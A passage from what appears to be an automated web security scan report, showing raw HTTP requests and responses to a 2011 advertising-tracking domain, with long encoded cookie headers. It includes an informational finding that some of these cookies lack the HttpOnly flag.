QLjLT3uFWX/HXp+K3yYMD+s1qh/O5fZ21itvVvyjurOJNHwPCBFNddUGGdHNUGO1T1Kyo42ZT/kMjgqiVSPrh+V27aJE522u9E5Uuvj48++J9zk0HAF4MP8pbMoeaq1U3zJHDdejn5X/BXm+thzK+Rj0hfGndyks5pZb2IvqvIrRO+Jh9lMW0WRh3MqKF/QUxLA0DV9lTInWhVKKDHCLf9B+Vr8d64IvjJ1SaxZM731RZxyn8HrvU6mZZo5hMLOYr95YzEFr9ZgdqU00kw90WgDPabslCoBnR8vLiP2BaVC7rX6eFBOv1ASiKQM9hdr0/ut12g3n8MYbIDtI7ghXyI31mAtBtWKqCrPU/eor48rAdH+FDHc8bvtoW73rj1Tpdq4/+oeY7fdYQjg3DsXB1bJFC2aHnkmzrR3l28WWFHb9D/32f+BBQA; udm_0=MLv39SEpLipv597JcdnUygV6rsvwpilMo4IXeAwquaRyre3gpPYIVAodYIp/pLDnrZ6pzwptsA0XKpUy7HBRG1IKyMiEh4VBn8RQKgHt6xmexyTANa3oP9nI5ve4Zh+cFpisilatsARekr/e1VTo6CfrY9ZOrKU59rPLHnZc0mKVcQ44RykdTAno/P8W1VY/OF5riAyTBWbBY+xYNSljIWcWOOtopIN1ZjQYZDMkgv8oJAkIGrSPg7YITZqDkGM+V0BX4IQvQU/ry0FVeR/RwM2R8eN2xwK8bXMaT8dnyGWiIwmFneP0q3borhBG+xrCFLFiU6qVr79K4V6YQuPzNuqA4/90ta/9VnFUEqhNTnmt1DrgJQOF4r1UEghYGiGgL7M7jrwbHJw9+F3CxjGnvmdNCsiiHDRDAMc/vfIfy1xA8L7rohMERi0dIDuvhqOPWEsI6+gjuwkRt93TDz/gwRoH3pOiO65cSq0JPJXL/eJxXICyA8Awu1c665ElpIHf+S2JzUt2IfmG6UqU7nNeIE7CqJ8wxwMGrI48La943kqanih8S8EHg93VfGjHcj2k0UdI+MOO5SUZtq0HZasWtuROl2/v/L3k3VhfBWMD9MKywUA3DZbUUdwgNu+Bc1D5GVtD/DFSVzHQd+Kthaux21W1VpYQzrJIOJqcfN+uFcepRaoHI2S6F+4MuQoZFMlFeSdfgpOqfSyBUa/S4SRDd2WkicgTYEf8w14nUrumB9cXOOs8IXQ3zkExOY2ILoGKzpi3VyhWA/E7FCSpV8XPeJUC3cephnvWTBkMkrOSNt+1c2G2kN2jJJu+t0Axdqd+gORvzH+Vh/dfmgaAk/YEKClysvExNZvw7tZ83xSC4kxPGUztLFNur6xF7/1lfGbJhpEOwNHvrxxdmXquPa98rGNTJlGE2KuHf96OXfa2fRUSFFdVEch+rdebr5A6GR+T8gEKpv5c/Kj/cUWy28+9cyQtHhLIz7E3JHVNRa1Iit99TBeVrjSUCEBciFZMwaQsrMtGEShvcBgNIKjzOM2bjkPTGk7U3NF9wbb7lKjRgR1a3vT+ePnQqbS+geKekpy0pYHIXkAz8rK/hMKwUUVuz/Sh6MkM2MO3MrV3kkzTtTQNj9q5xFCbt/phR+QzLH9cUhyOm+dQbNmQgiBz650QmznHkzThdkQ9qDa45Zs0ktlIz+ebUsOdl2IUiON4g2mdMKt5PQc62vmcGDUwYCvjBlm1gYSd9xvPi0tU6D3XX+oxjCU/9wnHCjGC8Y9JmhiMEF8QUbZgTzlV7IJD76HT9mUVgokd9gxAOQ==; rsiPus_xqR7="MLsXrqMOJjhroJB0OsFGPziNFPNiun2gwhaoALt97xKhGoM8aleSaGIshOB9JrGlJ9XZP2PSMq545hyVBVJdSnkgvS5ixQ2jzsY0ZWA+JOFBhqviZCWubV71mmTZ/tW5l+pH2v6yDAOuX7qLwExVNaXzP2AMt2j6L/eVkJ61W1sllb6Nc3moNgaTi0sWkkQCbNz7hXNo2IsC53dW3VuuZsmJb9X0AgiDcheSzlnAsnUq4LYdtCMaskgIpbgmkSHb9PrS66rT7Grgzql7HtldL8iE5xypWITXabh97tTpkU/qmOFPl2cWsADKk2Rc1gNqCs/wCa2GpcRYzsBBlGWu1Rx6Ss0719jAJPt3A0/cgXMK9v1+nMWxleyRS9Py7rbiFbkbA4dy82s+YNiWD1Bp0B/8YPQvjz5m6VsPK2bApJbudN0kRmgDQwBFdNYNT3Zod7YBYp+BG3MVnzNBbnI+yHUMxY8gaTCU7GSuHnVmZTUzeXLyNzdjGXICYBnSWVVzTm1uYa+UU29wqPQ14C9Ay7tt6GPEWSA5zQxfYzeLi20J0Nl7IC6vXnM8Od1ipWmbzVPXl7hr95e/RGmwPBkmqRC5aamjDudjkvgSbR3b42ft+lD1GQzV25ioqJNKAAsRVoMjgqHOtgRDBe0DOKYrT+tMQWMGn6nEChsmBKyFveyHmvauyQe182HvP5WE9xxj/WW1VFGrZH10B6y51pelmZhY2yUVhLbCHFAF1wgg9I1NLCQ22j9FIDUznCf6vIcdZKG8/ZdiKwDfKAnA8AB53vXcXDFW+bqz0Qi9tJP3HFnfYb06h1kepNXQWZKlZVW8wLE6GcYgBaTn7Edmli85qT4S83vxtkUUbMAtf+b0E1nSeX3q+qrQ2YpBw97usUXF9qEw1Kga7ue4/koD8yQel/qNlEjame/tLJ0jduVB+ytBY9sF93mgbUlL2ZeG9dCIkZ+m+iWAynUZGRAG3mH4zdRt6QJFtJnrSudJUxkSp36hMpMqoyWjYf/0Dzxx8sSoHwbQLc7K4XYWzwFKXoqtXqULfas/iA=="; rsi_us_1000000="pUMlIz9DOAYU1O2uA3Nf1wgg9Tpj7P+LBAm++DA1mQ19Ktk0xHtNbUdnsuhledavN12kASJwVH5lHOqeC4o2fHI9QkQeon8inPHPsPHufQb0id4nnMJw2upjcbtYuTDvN446mDNk0rjriNSbgDKZc06/pZLd8/z5IM1+qarydvJImOaUCavF5tQ+vJTy0vmLIKK5JakfcZvZ6vY5TRBbUhvbhTFBLWagpBIVk9PAmF2iRJOeh7n11Dcn8bkilhzvJuOwSrWjLV4c1dKSmGQXQgUCCrlrfg5dBoy/uKX5D/DErzUQPBw5wzlcHY0pwcQ4ohqHveeUO1fCklYt3yNLi8Ih4fiXA7KtiQmAv01haIfBqzbc3dy7UBOXBFA5UQx+zZY6T+r0AEWHCqu9zrcpE/K+dhafAfZdl6F9XwAK29pKStK8Vmo/hIZWj6P4pKDIwHnsIzs/CsI6oGdONCs57jOPg55C+8Eo4w2eN8X6XGvloOwC16CAbvKgsBHdOES2thl/yLffPkkgsVchivYvx1DIgzI+Hp2cwp15/JafiVSeTecIJRVt18r+Pf6AVQ9smmgMCZPjqwiXHhyXFqLJwepQkHnViNF27BPMR76afEDXmQK4X5YtD+7lbiGoEtKEsos76lXkFDeXHHplOgEvw0R+YSyi6fZVTgUbyYjzKicP8ItTRSjGP+9wmw4+6IWPluELGIVZSpte+L2p8Ak8G+6f39QiQNX9sYMuyPRDbuBHfKyeNWHJBFhuqK4/xZ7D/CTqehq/ghqdhipMBw5Tkr8mdUR/zxczguAqS4lU2jGjyE9g5myCi05INSSRNE5L4DNh54JKfld0ePji0KKkmwnQEKhnIFcxkTlb237bhRQDP++3zP1j2hiLU3mg4xi1Bay7LsKGEYilyYgtuJxssb25KbKk0l2Nx+BftGsREymmYzUPlB6j58myYGRehdpGh0wJvXFJhEomvMt3+RVVtU/Hs/dJeH/HekE15CjTKMwIovoWyWLWkLk/6AzLofDM76Xj3/75JEbK9bptsRjxMDFAem9ySqV4jf0esg7pJ4iPlT5pMZ10V4CW1LSJQcWkybORfD0N5UTmssjs9H6zArVaijt0fVauRh7dRVBdULPsaJ7riVOn6Uyy3PpnD9ux5E93rqsEK1x7fbJO18nv264KJ7YWZM5gXP2LEWHxvabbxbwwGJ1QhIMhDB0OoWtqmkDKiV/MucnamXFEmet8G/Cjst1gkpmYPuG6pBgUPehivSI0fOzA0wV/YCP1uYirYyEalVKutJsu2eWT6Je8BzKdbq10UjW6IpkVn4Go3iH0RzBFoGh24tA44C3aKTJa/2frujwGy2nzvvlF0sL6Rj1PGg46xmLjjYE5SjtBW0D/I+k61vl+3uQyzZb33wWkGruFU4eK51kxOG6IX6C3L2EZDPaFw5tQnQjHUEIn0UPw/CZ7yH+a0h5BL5t32WMOXQTwq/Vl4lnroXyo6Vhf1SzulnavN4Twzu12B47v"; rsi_segs_1000000=pUPF5EOhMHIMN6L9XiOlhjCqMTK6h6pMhgM0dgR2ZLwQuK591A7FUMhc07fslEjp0ID+u123pQJ2WOOcFehcGwRO3+GBodUoFsbRk/QoWYk4c6JHEfwMOMG014RVW/ae4EVImiihCtAOR7o00v1Av4W+67mjSX931yJFNEGnkXHKKGemM6oakhZYuNn++XSAaSD/KFcyeItwGqWmS5L1fWz3jOS657huku/N0SVSl2cJ3lUp4mzf/15P/SpH3uMjdcidqoplEHbuchfD9ywF3P66kGsfxYo1mxoymsoZetPIFP0ffNDfMLjjNFIzKlvZuUgbFfaFOL6AbG7GUvAjTSSs+fN0pT1Ek1A1O3Uawg8CYDi1iW8H0kygALN2qJ+ws9ZOH3ugpCLaZ5feHz0JxquchN2/rq+HLLuOZ8U7xE84mx8cR/xmi3McKUrpVsIwOgHBRuY4DkmM2frlPEGSBPv7VbJ1gOdXtavZhpvWa4MynECuel295hxlggN5joS+oL6zR/BvNNYxTBk/8bUbqkGRIF2YopY8aJfkcZJg/g==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUP15E+huAIMpqaIQFMFwqim7poa4bfK4iOHXhPolbdVqa7OUicFRaeJooUUZKyvzikWg1yU5VOL4SH98fVP+0bvuYvT98yo6AuyG3zQot2ZK0rTT30MK82st/RfAQXd0e3teEOxGv4Ph9AwHIZ1r0JXvnQEJBLiNC2Qmw5zUh/2xCnE7vS9RhWCRcgXYwstF/tN/Twdv9MqSTfibQAPE/oy0/MmgD0Vgyit1cyeZrhj2w6dNiPCY5yRlo6UThJKQL9WwzKoNrohHt3g+txoW4cFF0UZxpcSc3lkiFVSkAF8Zx71EADQGCrK6368/nClPUfbjU4Cpze0L0jbuqbGEL9imT0CkqLw4rJOF1sWW2MSfjeBJ6KpJoIegVLFup6y6GOnNuuYxizVH4uMSpHiLRoO8bnrD70d2NhoSx2TWqxWTAGmxOqPSS9SJMcTSCfB7rat99g/YdSkI3qHgMVsh/+uO9HMop9kplDuVS9M0SWgK66SJTr6D7taVuUHi66coxnwj+rapAOX8UUoMP9djOT3sxH6qQ==; Domain=.revsci.net; Expires=Tue, 08-May-2012 13:59:45 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=MLv39SEpbjpv597J8Z/sedPASVAo7kUMabFDwwxM9fNymV5Jd3DiIIGZ9hzJY33P3A+KF6wiqFdSDm7XsO1D30h8nbg5ShUOfaMZUXlHgKDlP891Rgb7CrQjbMluCqBxnLyqCbuFlIidjr74v7ceUZsp8QQLP4xHlqmGmRHLcLJ4Kk77fasSI9KiCV5fxtszoDyelrs2ELA6WYMNXyBK+qhERER9snh+M9GFAHjvJlk8+4Lsc7gdC92Bwaouy7oEcYO9jXpLgIb4OTdHtjx+++9FeBrwVBpzb6OZvHTFOydJxLQjwztIAlpXjbof/4C0cDbjTlABS2Run1F+Ig5heqcmGC9pEBGkhQSKSNPhHhfN/POpo5KA1SqctxnQyPn/2dmR1b4Lxv7mGIXTJqOrWmYLy61LI14ajPO/Xdt/PPxG8DHvgqgx/rvr+23vw7+UeJNuds4SmY+GstgYKvyS2xT11uUuuRhflSA/ksT28Wyg0usQ13X8Qi3v9GmNih9O/ZM3Dk+nN7X2e6tlIPWl2SLxgsUvq4lr//zmex87LZC0lXIzIrKCOkdgY29hwm3NjChXDulB7pLp/xx4t33391nSKDrbqdHhcloObMsj3s7iQSQa0/PE60Qj46hwU/YSTF7gYhMk5rQioyC8Fsqialev0/0ZXyk2G0xyDlDuDBa3Ovjyoxk8kjCW+jso2+Ll4uqejrrmUdojatyq8mhgcsSHIVwF5yLdpuq25X//i1ULUFkFggeXwUn4F56T3LMS7ZNFrrlu/2tLehzFpRXk/GzZs8sRmO5m/UL+mJwfJFt+GZGWtRj28WoNIhdg7Dck3SCcOQ7jyC0o6TCr/lI38SE0Nnwss3q/JIny1jW86pRUk9hQqRyVix1oV9r2Qolj1ViIs859koctlOqCEAfKQBCU+7oodZ2cqnPQeriSAnJcHtd/u42V8Fx0zVzXFuy1XBvHx1EC45W20tb+S4y/u3TP4a9+NsWv5waghX7HsYa878dEmhTeZWnwbRwB5f5aQLPK0JfmnuS/oBn/cbiTz4pvqHuvLDwpDSgXpuTBhBXScyPL18llD2S9yq0qPwJovdJl5N85ek9tmSm04l2V+FpSte5D286eCfuoZm71IG1806bNXAHWKARnkGyyVXANVJr9Uv55+Ub3SYAecwTyZGJMV8tSI1bBnC2aB/5gAgR+gs0sK050JWuWpAMPEXrAPBEylB3N9eVbQ/DiyS8SX9YR2b7B/BhV+GzeXq9waTV68Q7qCiet/oxenS5f8N/vEo+Jqk8R87ElBQffEX8A3imi//ZARoY=; Domain=.revsci.net; Expires=Tue, 08-May-2012 13:59:45 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: image/gif
Content-Length: 43
Date: Mon, 09 May 2011 13:59:45 GMT

GIF89a.............!.......,...........D..;
10.94. http://pix04.revsci.net/I10982/b3/0/3/1003161/448768738.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /I10982/b3/0/3/1003161/448768738.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /I10982/b3/0/3/1003161/448768738.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.nme.com%252Fnews%252Fsufjan-stevens%252F56527%253F_rsiL%253D0%26DM_EOM%3D1&C=I10982 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decdd4f&0&&4dc619e1&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=pUPF5EOhMHIMN6L9XiOlhjCqMTK6h6pMhgM0dgR2ZLwQuK591A7FUMhc07fslEjp0ID+u123pQJ2WOOcFehcGwRO3+GBodUoFsbRk/QoWYk4c6JHEfwMOMG014RVW/ae4EVImiihCtAOR7o00v1Av4W+67mjSX931yJFNEGnkXHKKGemM6oakhZYuNn++XSAaSD/KFcyeItwGqWmS5L1fWz3jOS657huku/N0SVSl2cJ3lUp4mzf/15P/SpH3uMjdcidqoplEHbuchfD9ywF3P66kGsfxYo1mxoymsoZetPIFP0ffNDfMLjjNFIzKlvZuUgbFfaFOL6AbG7GUvAjTSSs+fN0pT1Ek1A1O3Uawg8CYDi1iW8H0kygALN2qJ+ws9ZOH3ugpCLaZ5feHz0JxquchN2/rq+HLLuOZ0VKwgyhnjOvVX8lAqNNGQnydj1ObQFnZ3eyoEiP2frlPEGSBPv7VbJ1gOdXtavZhpvWa4MynECuel295hxlggN5joS+oH68R/BvNNYxTBk/8bUbqkGRIF2YopY8aJfkRkxg7A==; rtc_Wdkl=MLvn9zU1JwprpgZts8KQPOfaDcghJRY/syRG3WmM3le4ahJ60DTLD9+eQw9TOWi3mDGoGjklUGHxoEY411AnlDFR7yxZ8S+5rurGG9f9pKwr4QIY3riFWwRW2/4Pe6fIj9pfpVEFteudvD/rxinl01fHUDRopiXl3GV8QG4osgcIGNdQx253r5pJdcwR9YNyu0DNQTJxMId3nnJVUuDBpShinKA4tGa1cJ5+Hi2h59O3EJ9kKg9GI5OyNT9anWrXE6ywNFSU8AW4cLbauLlR5eS2CLmnPIYYHKESl6oWWm0MTZXo6HvTRjOh3Kxjjr71vvRTm7L5Tz/0AbnlXpfN5o3CS5RjdMCB3pJQ2xQbBI3eRje/yubp9KxdtHOub8fTM28fZtJ4Ff2evOSytK6+rguHT8qBsX3nAF+4suLuuzKXbljxXplpid99mfevz1NlGM1rlme7TFJHFw4T1WuGDkF0/Bw+17f4hzOZ89iGWZOwrinriMKVgfY7jgoThgi2LCqlToo4fv3BlxJBfv516scfvSGQii09J+OKaow2IMFHec2le5u592GGLOoNfhzh0wpAqny0dXMRunGZyuZpmgLUxyUcKEwjHtT4X/AWCCCKORS/JMUrvxw3RAPJ6tF7CPQVmN7vqfcMGol2PIwqma6LxPH616WqLSzSnYgrsHT0TROIWZVFqnuaJM072T0MT5VgEjbfrOrd4LflERbjcTxSI2oeuTXiK4/DDbsMpXxVYN1Y2+usrIA2tC4YKZcBieXRepuUWczdfoZq+FnW2fy54+8Ahj2DVr9lOeaPFz2YdxRA1DSkZ4p5j9nptFqVYRp7FQzd3L/rYbDcNwxsgNzSO1d/3MsEpZ+u6l/tYp6235d2EPF1lJvs+eY9ItWr2vywljErTzIjlFHOn3/vKN1lEO73a0MbZqAdadvoFSbLJ0FvE19rnlZr+jLJUArQXcyjG6qIfxe/x1qg9xSiD31RT940BPPNPFuSB3jU1xCgzxdwZN+cLq4+t59GjXdlNZMYlZEgjb2U0xa8rhgytOKQKj8cmLxuSqaEZ+rWPzIohHg8f7s/uwKkvXH7iStjrfLqN0iCTEktKJXa/EwxS3z/MCvPn1r/idkifyjhHKEVC9C8zVl28Q/obJ7v8A4+p79u6ECvoWawsZnxyX2Sk6D9FNVYNlOJvedTMFsJwjXTr5IfjCyqZk/UBqwFopBNsF8mpjRgy0jItxUL6s4Q7hJdKlt00izGkWFGjIaDJ5kgZqTbls7bo0uCnBhS0EivUGf5It9R036YZRZQhxLAMohm4BfvheaScBd0B6LD+dTsBOvBZt9qi8tKiSbAaWZAZG0kSm+xaQ8kjECVabgciinTfHRfdpcUgspdFtG/gYEj/BGsLUEDEDI7RiOCgIHqoGp9U8cm+NPOB87TWiP0V9cm6dG/MoQEGnmIEcpVMkMbUqQQPupK8MsZQ14dKvTqSRi8zQdNUKGRl/VBOD0x4AipEdvfcRFT77t0mzC0MtmgixiyT97l2MWc7nrXw+dbSqjkDo/V3VevRKGZiARbawBaubiTK1iTZ5X/QPG06n9m/GdUjFWTiJTeUtEsWyR/00AFRQ1ar060riKgW0WNe5vm1v/hmD2/AqXENoELyR0vXiP4im0//qAix0JrmEcuVRVnuzsHTORwkiEWyF8n88lfFjkZL4mXL6Ur0sWd4e2vaJRwp8A=; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4decdd55&1&10011&4dc75936&271d956a153787d6fee9112e9c6a9326; udm_0=MLv39SEpbjpv597JcdnUBu4MHEenRCd8VPQOZXj35OaFc5qnI8MKCuGnn1SBN3Wnlqzb1/yfNaxCbp9btShq6NvtHJWkO5yz1lh5l92l+unpO8a62HEC0Ow3WsLVWsQO/LH6+aoOEKzXH626/J57yCfXh/SJ94hwXC0dfP558ntGi+TU3NFRXHYa8+u6SoZXLSsbbKVaGlLBJWNm8hDUZzQqCt6nJiWA5uBufndLwp+daMTDTfyoG0u88UrfSLKLtUwmK9Nc4+z6EEtp+jVizB4mNweBK4+LPHOgz7mIIN1zEXOuNDS2M3fG45TcRhoFUg7VUoH4CrMwF5Hpm1b9QGhYTjezLcjOEtLIYizka+GxtFQp+VpovDwshk/5DWsqucfelZBHOq6PNkU4W0j0xbqkwPek+ROrQddfTZv1pNfgRSYxFVvPYmCb4nrJkE6/Peg3SlGFEn9/rySzxBikRJmE3/M+lcGEQtcTVk6XNz4n/DcRuhSFd65APv6NbKeC0HI6lNEUNzL+w64Hg+pG4olOwauUJwKqznmt+LB5rRjeluO8lSlvSBWQGVjhFm+gIpo9t+Yxqi4Z6uY0wSPgV8rTfN48XfW9RTj7ci2zEgmrOn1sN6QxSV7zb2x9cF1Mg+BA9sVQEMOsTWxmc+20Gr2V6H9VMFkU2ChzWlllS1boIRa3E/f1sBgqwD6TvxrYAvRkVVeal/ThwkU0nX8scPQiZzAqIs3IeNjBUiNOMadIxaU9pT5zdkTfaCQLjbTqbQPN35UFLAQBoj8ANYBC749UUW3BXFOcvPiv+T4YmYn9O9+lruitAIYyG9TQLPJnVSINqWfDptNc1BkY+p2mgA00NHBRERyw0E6NiPaBaltF6a56LYEXqfbbF/Gu4Wf77t5UCPm1daS12CqLzhf91ykW8SLmb14HhEZ6jZGGvdPljDhV/m9VoiyOCYbeLW/aUAcz5LJUBeoWHNBb7NaLvlgsIj4LI51awNXjRD4dphanGc82HIPY364YbduxCjYn3qTfpSrm/exLtSUxnAbQn4cG/qOec4i7XuuCoaWMrKMGX/I+uCJ2q7C2N0bVCkMZBSEVEEshLUVLQ9TcCpEo72HPSAWY9AgCPz+RdghUBRpyOB9CmRHKmYe5kupGqYYAY8zLxVOdDQPO95g4jYDw856TtCNHODN+d10UHIyZRtWfFpavvlcymO88CcT4BmFmzBVeXmO4ypieT8f+T0bRs6sbp6oxezSidqCe+kgT1niBnV6hwEbiOULFjWaip799DGaPudLBvACvunnTH8sAt5jLFhSMvJ4EzaFro1t7dUzN7znrBxyRg94NxPi8SY5T4sRRXw==; rsiPus_--QM="MLsXrqMOJjhroJB0OsFGTywSQa5gE3bzGLWC77EYlL0V6PUwpFqMKfRo/WIjxatotGUBLfh18Iw7W+qkAQ46bVHoTrv1pQwNKjjgNCNHJPbpAgH4IzR/+iRbVue91oXW/jKsDPa7vbvxtrd33fHq34yrFQuJku+bgm+8EVffudcKN4iuBvrN90qHeI4xaY/Q1W1yNsL5KOlsGxNqhUiNOXe5nn986aJ67S/0tULtWPdrG3lhpPsdb8xO/n/lB581aDn762WB0ihbZBOeu3Ufx+HpLRh+8Hbf0zZq8pfGKCS0hlRrIAabwnKXGJwRIMywuWQPjThCbo0KSSFQIP4mo76IAHMZnYNH0tuqRyB/AEZngSZCLfLYF3Zs5g4nZoGO0cohFtEneaCcGDtskRpSY+dP7h0gnUP0L7R7A/8xlqSZ/W2KkRpVIhjwQAOTk48sJD1PxXjX0x5XdtsfLihcm9VuIUiHpGRUF7F/idal7Hq+0pROgbBT6KCcol1snnTV0V5F0xpBZk6CRy2ugCPvNan6L1McQFvgbXEKldtpFMfuZakR635XR4x1RXCLCkkxUCfQPGc6mBZWiKgoRHEO3b0otALBdNCIIFAiSKxefi0nPrtknQ3EMXhwwvPIzXKIQsOaoEWNpAIcShIHiDOF3qSKWFuDqkb2jqtMxvBdfAVFP7NcbvzKM+3/ueqaVRMDxCeeJ+flWQpzF+qS4BrI4Dt7AUZJ2EeFM4m41UyM+T7FSi5tA/qwqOwo4kK2gHpUVKssP2I+Ee7LhGobkwOJUOMfgbzVozWgQuSKoq5kZ88M185NbAGUupiqDKHqMcj+dBKc9fPP3KK+5EXLdrvEPS5YK+cSdBxxlTzlrYRJ3wJXAiV2dnrBaaQP+zIJOpgPpvL1xtxxrkjB56lwuYrzB2bgI6uI/AireNneSB71/kJavLpmOV3ZKyXlMBYkfyXB8qTG0Uev1gg9C57Wn8epqz8lCu0573dEnu71OAvS2jhxt+Kw6FPI+tTiLCxWwwjS81QgDUZk9v3k6axNYh2OWMWlOaV+U8pWNdAebenCcqc="; rsi_us_1000000="pUM1Iz9HMAYU1O2uQ6agQvHtomeq75Ig4g4EmJ/A6n4WsknjQhUq8iBul7F68iFx8cqm3SO9eaFvyn1GBw/eJPslZlA8PhpTTZGsXb7RjDc/iMgnjkeolupj4fLTEQPVKscYxoDVuEdJuZbaK3D9xPuOIhlowTJ+ya38j5p4Ta6Bz/HWeH0nosUPna7vHxaZ5XoL5l/dnmXwpPm5VWpbUOslRA5BxSe4ZOkSE9PAmD2iQJPexlX0wmcIAbK7tsGmzGATNf80Fqyl751/l8juNUu0JNYEx45nWIRv/C8BOiTiJbO5g8IGAzpcI40V+UQZmhqEPeeEc1fCQnI0TCPjgkID7R2wwigMSHt5VUBgTb+NyMxPLwLONDY3TuokJnmzHPnnRDkuVRiS5+Uyz4YpGNKGlhaPSdZ9n4EB3wX0uvpMSNK4Fmo9jIaSj+ncTHidAXiIgQDfusP6TCa9QdU2bznEQzcv9BCophz20fJ1WW+kENTBipABVnZA56YjECEEY3phD1JQzHGdVrVseyuEk6GWi92FSiGLJ4812+Br34U7q3VQBxTRSEt04mb9b+Nu053VTtbctHkK68djsAFkE74d8kPDFLOH8lRboZwLXX6HqUXD02RKMs5PWsH+ziouWDQYmVb8hZ/ecArQiVYBI4aPw+kfQuXmbioB2aEC0lxOEpHD/Ns9MsBpCzc5UqHnCYeRcpcYLhhYm4BPjPFrgYw8D4NABb/5+fzD8h2U3LvMxcVcLWdaMX4aKoPVH+KL74p/EdmylBc1de/czv/dSpACqyj0uifAEyPR50aV9cwCBjohIoFo9EOMVH6RMd7onZ55R4I4FSIgeCRK0c4wgNxjTMXno77nWOf381e4nnQbO463zH1b2jgH0FmsgwCxBKR5LsbHEUqdx0oVuJzssP3YK75lqpQheuu3QYCc6leVSJ0morqXGrRuMXQbQrgyVMCQgz3qL/OFP/kN/cJMZe6ViH5t1Gdp7bjk4yCudY/fH/RWKgw9ywS7g4LBjxX2XrVDkyrkyMkUeGj92tKDN3nwYWN2isOHQc0tZtLOL/8WEUOseW6PUtOc7HPHXkhurCilOyFhqPwtVkrNV9iwiE6/OEwXFDX/aXR9ceCoOAiQkffNc/FhNzpBQE1u8u3E6JnrXkfFsNN0SqpfDvGaQnlA5yxO+k/zo/hv8QT1f8yC4/H0b0V3oZQU62XPrD2wB5Kv4sv8RmzGKE7qz8BL2mQX29agkU8ECTuBwmAb6UIzgDgLdezAM7zWMEN9lNvnbyEhVz4KlJteKeaP6JM8QWkSqGwqE4JwqHmmDFepCsQRHRGrBiMwJA76NRpMK59CxAt0fbzHEYqA+JmFKmMDiGhSr7vA0le7ggiHcPnY4yw16dWwbcJEsbg9ulXJ4JGMYgnw7KoKzVD4RSJBC230sX+mBeGHoQSxN08MTZ+4NCxPZspf/4y9JLqybhHYnhyK+r/gBv5lHBLh2Qjg3gH9Ms4jvQ6ewPsqEIGFdCBtnIuWzVKiX5T6glm3a6fLZrlR/OoU"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_Wdkl=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUP15EOheQIMpzaxu2F29/z4Oss1gLZjumZlkn0IsTQ0mXYWnkGNdTd0q7tfEV6W8KaA3WTv2SKVvoFps/JP+0YKGP4FVfVmNFbbEBVo2TvwxyI3eOkiCXmElzZ+zqlLEAHcyxHntH2W3rV/P/bewx/MpTmnj0Shaa+7AEiTL+o1cf+UTe9ucpdpLtFxxiSKRpIbr9tHjiUe8+1Vo8ajppHmmGlgcGjk9iXdch2jqc0+EIC7XHgoe52DlwgGaLkVNJbb65JjWHngta9bCG7qqwHxg/HhHfrMhV1qOIlK69wvP0uiSL3TvDIIzaG7pKOGWspWpDShSS+EO2T6H9ABaQ8GSfB4NPz5Gd4GmO8WVU0yjzYmO6gaVMjz6TZUYu66LMc5LTZ1wwmciXF0E7InfKXKBUa79FbqAzB8mGblMSLCBZp0yo5CPcJOyGSwutSBWax2+C3V+iL/LNwVEWhzNzJhOKK5ncfiUQrMMkf9FURDR/z6pVMmACLu1Ew37/uS1PeyZqwSqM6PkjwJaViHsjAyy5tP; Domain=.revsci.net; Expires=Tue, 08-May-2012 14:01:00 GMT; Path=/
